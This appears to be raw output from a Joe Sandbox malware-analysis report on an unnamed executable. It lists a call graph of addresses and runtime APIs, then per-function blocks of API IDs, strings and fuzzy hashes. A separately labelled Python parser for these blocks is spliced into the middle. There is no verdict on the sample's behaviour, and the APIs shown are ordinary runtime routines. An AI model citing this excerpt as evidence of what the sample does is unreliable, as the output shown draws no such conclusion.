19566->19567 19572 7ff6385c98e4 19566->19572 19569 7ff6385c9a2c RaiseFailFastException 19567->19569 19570 7ff6385c9a39 19567->19570 19568->19566 19569->19570 19571 7ff6385c9600 2 API calls 19570->19571 19574 7ff6385c9a11 19571->19574 19573 7ff6385c9600 2 API calls 19572->19573 19573->19574 19574->19560 19576 7ff6385c48aa _swprintf_c_l 19575->19576 19579 7ff6385ccbe0 RtlCaptureContext 19576->19579 19580 7ff63862abf0 8 API calls 19579->19580 19581 7ff6385c48b9 19580->19581 19581->19515 18756 7ff6385dce7f 18757 7ff6385dced7 18756->18757 18758 7ff6385dce84 18756->18758 18766 7ff6385f0640 18757->18766 18774 7ff638600af0 18758->18774 18760 7ff6385dcf81 18762 7ff6385dcfac 18760->18762 18782 7ff6385f4180 18760->18782 18788 7ff6385e43d0 18762->18788 18765 7ff6385dd014 18767 7ff6385f0656 18766->18767 18768 7ff6385f06f0 18767->18768 18772 7ff6385f0687 18767->18772 18804 7ff6385cf550 18767->18804 18793 7ff638602160 18768->18793 18772->18758 18773 7ff6385cf550 6 API calls 18773->18772 18775 7ff638600b09 18774->18775 18779 7ff638600b19 18774->18779 18775->18760 18776 7ff638600c5b SwitchToThread 18776->18779 18777 7ff638600b69 SwitchToThread 18777->18779 18778 7ff638600c67 18778->18760 18779->18776 18779->18777 18779->18778 18780 7ff638600c10 SwitchToThread 18779->18780 18781 7ff638600c26 SwitchToThread 18779->18781 18780->18779 18781->18779 18783 7ff6385f419f 18782->18783 18787 7ff6385f4213 _swprintf_c_l 18782->18787 18784 7ff6385f4202 18783->18784 18783->18787 18858 7ff6385d4c20 VirtualAlloc 18784->18858 18787->18762 18789 7ff6385f4180 2 API calls 18788->18789 18790 7ff6385e4405 _swprintf_c_l 18789->18790 18791 7ff638600af0 4 API calls 18790->18791 18792 7ff6385e4555 18791->18792 18792->18765 18792->18792 18794 7ff638602225 18793->18794 18795 7ff638602199 EnterCriticalSection 18793->18795 18796 7ff6385f0719 18794->18796 18810 7ff6385d4980 18794->18810 18800 7ff6386021b9 LeaveCriticalSection 18795->18800 18796->18772 18796->18773 18799 7ff638602253 18799->18796 18801 
7ff638602264 EnterCriticalSection 18799->18801 18800->18794 18802 7ff638602283 18801->18802 18803 7ff63860228a LeaveCriticalSection 18801->18803 18802->18803 18803->18796 18807 7ff6385cf597 _swprintf_c_l 18804->18807 18805 7ff6385cf61b 18805->18768 18807->18805 18809 7ff6385cf5eb 18807->18809 18813 7ff6385cf210 18807->18813 18809->18805 18822 7ff6385cf630 18809->18822 18811 7ff6385d49be GetCurrentProcess VirtualAllocExNuma 18810->18811 18812 7ff6385d499b VirtualAlloc 18810->18812 18811->18799 18812->18799 18814 7ff6385cf23a QueryPerformanceCounter 18813->18814 18816 7ff6385cf261 _swprintf_c_l 18813->18816 18814->18816 18821 7ff6385cf2fa 18816->18821 18828 7ff63862ab44 18816->18828 18818 7ff6385cf387 18818->18809 18820 7ff63862ab44 _swprintf_c_l 3 API calls 18820->18821 18821->18818 18831 7ff6385cc7b0 GetCurrentThreadId 18821->18831 18823 7ff6385cf685 18822->18823 18824 7ff6385cf68f QueryPerformanceCounter 18822->18824 18854 7ff6385cefe0 18823->18854 18826 7ff6385cf6e1 18824->18826 18826->18805 18832 7ff63862ac10 18828->18832 18831->18818 18833 7ff63862ac2a malloc 18832->18833 18834 7ff63862ac1b 18833->18834 18835 7ff6385cf2d1 18833->18835 18834->18833 18836 7ff63862ac3a 18834->18836 18835->18818 18835->18820 18837 7ff63862ac45 18836->18837 18841 7ff63862b7d4 18836->18841 18845 7ff63862b7f4 18837->18845 18842 7ff63862b7e2 std::bad_alloc::bad_alloc 18841->18842 18849 7ff63862c50c 18842->18849 18844 7ff63862b7f3 18846 7ff63862b802 std::bad_alloc::bad_alloc 18845->18846 18847 7ff63862c50c Concurrency::cancel_current_task 2 API calls 18846->18847 18848 7ff63862ac4b 18847->18848 18850 7ff63862c52b 18849->18850 18851 7ff63862c576 RaiseException 18850->18851 18852 7ff63862c554 RtlPcToFileHeader 18850->18852 18851->18844 18853 7ff63862c56c 18852->18853 18853->18851 18856 7ff6385cf00a _swprintf_c_l 18854->18856 18855 7ff6385cf031 18855->18824 18856->18855 18857 7ff63862ab44 _swprintf_c_l 3 API calls 18856->18857 18857->18855 18859 7ff6385d4c5b 18858->18859 18860 7ff6385d4c6c 
18858->18860 18859->18860 18861 7ff6385d4c60 VirtualUnlock 18859->18861 18860->18787 18861->18860 19582 7ff6386ebba0 19583 7ff6386ebbb1 19582->19583 19584 7ff6386ebbba 19582->19584 19585 7ff6386ebbd5 19584->19585 19587 7ff6386ebb30 19584->19587 19588 7ff6386ebb49 19587->19588 19591 7ff6386ebc40 19588->19591 19590 7ff6386ebb59 19590->19585 19592 7ff6386ebc57 19591->19592 19594 7ff6386ebcba 19591->19594 19596 7ff6386ebce0 19592->19596 19594->19590 19595 7ff6386ebc6b 19595->19590 19597 7ff6386ebd13 19596->19597 19598 7ff6386ebd7b 19597->19598 19599 7ff6386ebee4 19597->19599 19600 7ff6385c4c80 28 API calls 19597->19600 19598->19595 19599->19598 19601 7ff6385c4c80 28 API calls 19599->19601 19600->19599 19602 7ff6386ebf9e 19601->19602 18862 7ff6385d1e00 18863 7ff6385d1e1a 18862->18863 18864 7ff6385d1e25 18862->18864 18865 7ff6385d1e52 VirtualAlloc 18864->18865 18867 7ff6385d1ea4 18864->18867 18866 7ff6385d1e8b 18865->18866 18865->18867 18868 7ff63862ab44 _swprintf_c_l 3 API calls 18866->18868 18869 7ff6385d1e9c 18868->18869 18869->18867 18870 7ff6385d1ef1 VirtualFree 18869->18870 18870->18867 19603 7ff6385cbe30 19607 7ff6385d94ce 19603->19607 19615 7ff6385d9651 19603->19615 19604 7ff6385cbdf5 19608 7ff6385d9535 19607->19608 19609 7ff6385d950b 19607->19609 19619 7ff6385dea40 19608->19619 19611 7ff6385d9514 DebugBreak 19609->19611 19612 7ff6385d9519 19609->19612 19611->19612 19612->19604 19613 7ff6385d9558 19613->19612 19634 7ff6385dbc10 19613->19634 19616 7ff6385d9630 19615->19616 19617 7ff6385d9519 19616->19617 19618 7ff6385dbc10 3 API calls 19616->19618 19617->19604 19618->19617 19625 7ff6385dea6f 19619->19625 19621 7ff6385f6d90 GetTickCount 19623 7ff6385dec7a 19621->19623 19623->19621 19623->19625 19631 7ff6385e6680 13 API calls 19623->19631 19671 7ff638602350 19623->19671 19685 7ff6385ded20 19623->19685 19624 7ff6385deb29 SwitchToThread 19624->19625 19625->19623 19625->19624 19627 7ff6385dec4b 19625->19627 19630 7ff638602510 WaitForSingleObject 19625->19630 19632 
7ff6385deb55 SwitchToThread 19625->19632 19633 7ff6385deb1d SwitchToThread 19625->19633 19641 7ff6385e6680 19625->19641 19649 7ff6385df2a0 19625->19649 19668 7ff6385d4930 19625->19668 19627->19613 19630->19625 19631->19623 19632->19625 19633->19625 19637 7ff6385dbc46 19634->19637 19639 7ff6385dbc7f 19634->19639 19635 7ff6385dbd55 19635->19612 19636 7ff6385dbc59 SwitchToThread 19636->19637 19637->19636 19638 7ff6385d4930 SleepEx 19637->19638 19637->19639 19638->19637 19639->19635 19640 7ff6385dbd50 DebugBreak 19639->19640 19640->19635 19642 7ff6385e685f 19641->19642 19643 7ff6385e66b0 19641->19643 19642->19625 19643->19642 19646 7ff6385e67b9 19643->19646 19695 7ff6385eea40 19643->19695 19646->19642 19701 7ff6385d4900 ResetEvent 19646->19701 19650 7ff6385df2dc 19649->19650 19653 7ff6385df492 19649->19653 19651 7ff6385df34d 19650->19651 19652 7ff6385df497 19650->19652 19654 7ff6385df35c SwitchToThread 19651->19654 19652->19653 19707 7ff6385d90a0 19652->19707 19659 7ff6385df36a 19654->19659 19656 7ff6385df411 SwitchToThread 19656->19659 19659->19653 19659->19656 19660 7ff6385df43d SwitchToThread 19659->19660 19661 7ff6385d4930 SleepEx 19659->19661 19666 7ff6385df405 SwitchToThread 19659->19666 19703 7ff638602510 19659->19703 19660->19659 19661->19659 19666->19659 19669 7ff6385d4934 SleepEx 19668->19669 19670 7ff6385d493d 19668->19670 19669->19670 19670->19625 19672 7ff63860236d 19671->19672 19673 7ff6386024f9 19671->19673 19674 7ff6385d4050 10 API calls 19672->19674 19673->19623 19675 7ff638602394 19674->19675 19676 7ff6386024e7 19675->19676 19677 7ff6385d90a0 WaitForSingleObject 19675->19677 19676->19623 19680 7ff6386023cd 19677->19680 19678 7ff6386024d0 19678->19623 19679 7ff638602459 SwitchToThread 19679->19680 19680->19678 19680->19679 19681 7ff638602485 SwitchToThread 19680->19681 19682 7ff6385d4930 SleepEx 19680->19682 19683 7ff638602510 WaitForSingleObject 19680->19683 19684 7ff63860244d SwitchToThread 19680->19684 19681->19680 19682->19680 19683->19680 
19684->19680 19686 7ff6385ded5c 19685->19686 19688 7ff6385deecb 19685->19688 19687 7ff6385d4930 SleepEx 19686->19687 19686->19688 19690 7ff6385ded9f 19687->19690 19689 7ff6385dee4a SwitchToThread 19689->19690 19690->19688 19690->19689 19691 7ff6385dee76 SwitchToThread 19690->19691 19692 7ff6385d4930 SleepEx 19690->19692 19693 7ff638602510 WaitForSingleObject 19690->19693 19694 7ff6385dee3e SwitchToThread 19690->19694 19691->19690 19692->19690 19693->19690 19694->19690 19696 7ff6385eeaeb 19695->19696 19699 7ff6385eec48 19696->19699 19702 7ff6385d48c0 QueryPerformanceCounter 19696->19702 19698 7ff6385d4050 10 API calls 19700 7ff6385eee31 19698->19700 19699->19698 19699->19700 19700->19646 19702->19699 19704 7ff638602526 19703->19704 19706 7ff63860255d 19704->19706 19711 7ff6385d4c90 WaitForSingleObject 19704->19711 19706->19659 19708 7ff6385d90b8 19707->19708 19712 7ff6385d4c90 WaitForSingleObject 19708->19712 18871 7ff6385df61b 18874 7ff638600ca0 18871->18874 18873 7ff6385df5f3 18873->18873 18877 7ff6385dc9a0 18874->18877 18876 7ff638600cd8 18876->18873 18878 7ff6385dc9e9 18877->18878 18879 7ff638600af0 4 API calls 18878->18879 18883 7ff6385dcac0 18878->18883 18884 7ff6385dcaf6 _swprintf_c_l 18879->18884 18880 7ff6385f4180 2 API calls 18881 7ff6385dccda 18880->18881 18882 7ff6385e43d0 6 API calls 18881->18882 18881->18883 18882->18883 18883->18876 18884->18880 18884->18881 19713 7ff6385c4308 19715 7ff6385c430e 19713->19715 19714 7ff6385c436c 19715->19714 19716 7ff6385c4c80 28 API calls 19715->19716 19717 7ff6386ecb01 19716->19717 19718 7ff6386ecca0 28 API calls 19717->19718 19719 7ff6386ecbe1 19718->19719

Control-flow Graph

APIs
• GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D46FF
• GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D473D
• GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D4769
• GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D477A
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D4789
• GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D4820
• GetProcessAffinityMask.KERNEL32 ref: 00007FF6385D4833
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
• String ID:
• API String ID: 580471860-0
• Opcode ID: 2499757e382cc0260e021b004913e5396d42f961aaff0a7f38b800a9eef933a6
• Instruction ID: 9ad88dfb49ee934b81c95e3b3724cf36ca61a75b957ff33062efcf43db70982f
• Opcode Fuzzy Hash: 2499757e382cc0260e021b004913e5396d42f961aaff0a7f38b800a9eef933a6
• Instruction Fuzzy Hash: 50513A33A5868686EA80CF39E4001E9A3A2FF55795F844032D94DCB765DF3EE64DE708
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF6385C6E73
  • Part of subcall function 00007FF6385D0580: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6385D067D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: ExceptionHandlerVectored_wcsicmp
• String ID: StressLogLevel$TotalStressLogSize
• API String ID: 2513536313-4058818204
• Opcode ID: db9029060a23648276927aef3b946d57bbea15317c2cacec7f1b821d138b9c72
• Instruction ID: 3b8fd2bed15fa2d3b264c4a0e9354d3516de8edaf9965dec27b6ad35a7d365b6
• Opcode Fuzzy Hash: db9029060a23648276927aef3b946d57bbea15317c2cacec7f1b821d138b9c72
• Instruction Fuzzy Hash: 68319333E0864285EB909F34E0012E967B1EF817A8F484035DE499779BDF7EE549DB48
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: BreakCounterCreateDebugEventPerformanceQuery
• String ID:
• API String ID: 4239280443-0
• Opcode ID: 13d23e181a2cb41bea5292db9cb94548f886d0b06a318fd914d236553dce4aea
• Instruction ID: ca179884f2386f2549b63ac3d2eda9d35b58d3d31316388f6ea29b6a51e9c1cc
• Opcode Fuzzy Hash: 13d23e181a2cb41bea5292db9cb94548f886d0b06a318fd914d236553dce4aea
• Instruction Fuzzy Hash: 3C622737A08B8681E7508B34E8402E973E4FF58795F505639D98D93761DF3EB1A4E308
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
• String ID: Creation of WaitForGCEvent failed
• API String ID: 133006248-2073067640
• Opcode ID: 90160015fc6a4fbc39dded32f23d7fb88664e5d067279ed4b6ff92c114ef6361
• Instruction ID: 041d11026c3702608a0c4ffa958de048448ae9c146af308dc601265f0b4f41a7
• Opcode Fuzzy Hash: 90160015fc6a4fbc39dded32f23d7fb88664e5d067279ed4b6ff92c114ef6361
• Instruction Fuzzy Hash: 28027C23E0DA4785FE94DB31A9512F92292AF44790F58453ADC0EC7392EE7FB448B319
Uniqueness

Uniqueness Score: -1.00%
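The per-function blocks in this section (API call sites with their ref addresses, the '$'-joined String ID, and the Opcode/Instruction fuzzy hashes) are the fields an analyst pivots on across reports, for example to find every function that installs a vectored exception handler or to match a function's Instruction Fuzzy Hash in another sample. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses blocks in the layout shown above into records. The SAMPLE text is constructed here in the report's own layout from entries in the blocks above (with the "Download File" link residue removed); the names parse_blocks, api_sequence and index_by_api are the example's own and are not tool functions.

```python
"""Added example, not part of the Joe Sandbox report: parse IDA-plugin
function blocks of the layout shown on this page into records that can be
pivoted on (API sequence, referenced strings, Instruction Fuzzy Hash)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample in the report's own layout: two function blocks built
# from entries copied from the blocks above, "Download File" residue removed.
SAMPLE = """
APIs
• GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D46FF
• GetProcessAffinityMask.KERNEL32 ref: 00007FF6385D4833
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Similarity
• API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
• String ID:
• API String ID: 580471860-0
• Instruction Fuzzy Hash: 50513A33A5868686EA80CF39E4001E9A3A2FF55795F844032D94DCB765DF3EE64DE708
Uniqueness Score: -1.00%

APIs
• RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF6385C6E73
  • Part of subcall function 00007FF6385D0580: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6385D067D
Strings
Similarity
• API ID: ExceptionHandlerVectored_wcsicmp
• String ID: StressLogLevel$TotalStressLogSize
• Instruction Fuzzy Hash: 68319333E0864285EB909F34E0012E967B1EF817A8F484035DE499779BDF7EE549DB48
Uniqueness Score: -1.00%
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR"; an indented
# "Part of subcall function ADDR:" entry belongs to a callee, not this function.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[\w\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
KV_LINE = re.compile(r"•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*)$")
SCORE_LINE = re.compile(r"Uniqueness Score:\s*(?P<score>-?[\d.]+)%")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                          # address of the call site
    subcall_of: Optional[str] = None  # callee address when the call is indirect


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # "API ID", "Opcode ID", ...
    uniqueness: Optional[float] = None

    @property
    def strings(self) -> List[str]:
        # "String ID" is a '$'-joined list of the strings the function references.
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    @property
    def fuzzy_hash(self) -> str:
        return self.fields.get("Instruction Fuzzy Hash", "")


def parse_blocks(text: str) -> List[FunctionBlock]:
    """One FunctionBlock per report block; the 'Uniqueness Score' line closes a block."""
    blocks: List[FunctionBlock] = []
    cur = FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip()  # report lines carry heavy leading whitespace
        if not line:
            continue
        m = API_LINE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["ref"].upper(), m["sub"]))
            continue
        m = SCORE_LINE.match(line)
        if m:
            cur.uniqueness = float(m["score"])
            blocks.append(cur)
            cur = FunctionBlock()
            continue
        m = KV_LINE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"].strip()
    return blocks


def api_sequence(block: FunctionBlock, include_subcalls: bool = False) -> List[str]:
    """API names in report order; callee calls only when include_subcalls is set."""
    return [c.name for c in block.apis if include_subcalls or c.subcall_of is None]


def index_by_api(blocks: List[FunctionBlock]) -> Dict[str, List[int]]:
    """API name -> indexes of the blocks that call it (e.g. which functions
    install a vectored exception handler)."""
    idx: Dict[str, List[int]] = {}
    for i, b in enumerate(blocks):
        for c in b.apis:
            idx.setdefault(c.name, []).append(i)
    return idx
```

Feed the whole report text to parse_blocks and the records line up with the blocks on this page; index_by_api then answers questions such as which blocks reach RtlAddVectoredExceptionHandler, and fuzzy_hash gives the value to compare against the same field in another sample's report.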

Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f70da690df38cb77a9eebf6c1bbf438239b3850fbc342a8e413d422e42a12f72
                                                                                                                                                                                                                                  • Instruction ID: 36f3c82fa662cde94014df6f89a62829b5f73180982f4c680b9cec780e741c5d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f70da690df38cb77a9eebf6c1bbf438239b3850fbc342a8e413d422e42a12f72
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF62A123A1974686EAA58F35E8403F9B691BF447D4F54A135D94EE3390DF3EF880A708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 20f45f77a24c16fd6a7f37d80dc3a39ff9f99164258b174c3fad209598ee19b2
                                                                                                                                                                                                                                  • Instruction ID: 6c55e5b5c6e15227d152ee03006e7b2fbd3c217e5e9015648f6f21cb950ca454
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20f45f77a24c16fd6a7f37d80dc3a39ff9f99164258b174c3fad209598ee19b2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5152E063E09B82C1EA948B35A8503F9A3E1BF947A4F145135E95EC77A0DF3EF055A308
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 62cf54ca29fee18739608754cee850365ff5bf89207bf3d3f8c84ddab51d855a
